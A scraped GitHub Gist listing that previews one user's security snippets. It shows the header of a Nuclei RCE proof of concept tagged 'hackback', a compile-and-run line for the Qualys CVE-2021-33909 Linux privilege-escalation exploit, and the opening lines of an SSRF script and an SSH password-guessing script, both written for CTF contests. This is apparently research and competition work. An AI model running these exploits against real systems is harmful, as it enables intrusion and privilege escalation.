Skip to content

Instantly share code, notes, and snippets.

[iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood]
[iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood][iFood]
teste iFood
[iFood]
[iFood] Quartas de desenvolvimento
@c3l3si4n
c3l3si4n / aa
Created May 11, 2022 10:32
aaa
def main():
print("[iFood]")
@c3l3si4n
c3l3si4n / nuclei-rce.yaml
Last active December 27, 2024 09:13
POC demonstrating RCE on Nuclei v2.5.1. The following PoC will execute `touch /tmp/rce_on_nuclei`. JS exploit based on CVE-2021-21224 PoCs
id: nuclei-rce
info:
name: Nuclei Template RCE by Chromium
author: c3l3si4n
severity: critical
tags: rce,hackback
headless:
- steps:
@c3l3si4n
c3l3si4n / sequoia.c
Created July 21, 2021 16:21
gcc sequoia.c -o exploit; chmod +x exploit; ./exploit
/*
* CVE-2021-33909: size_t-to-int vulnerability in Linux's filesystem layer
* Copyright (C) 2021 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
@c3l3si4n
c3l3si4n / ssrf.py
Created October 19, 2020 23:16
Ultimate Hacker Championship 17° Finals - Exploit Script
import requests
import string
import base64
def attempt(payload):
data = {"contactName":"aa","contactEmail":"[email protected]","website": payload,"contactMessage": "A" * 40}
r = requests.post('https://uhclabs.labdepentest.com.br/inc/sendEmail.php', data=data)
output = r.text
if 'went wrong.' in output:
print("error")
@c3l3si4n
c3l3si4n / two_set_of_credentials.py
Created August 9, 2020 00:56
Two Set of Credentials exploit script for SpiderLabsCTF2020
import paramiko
import sys
import string
import datetime
def test_password(password):
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())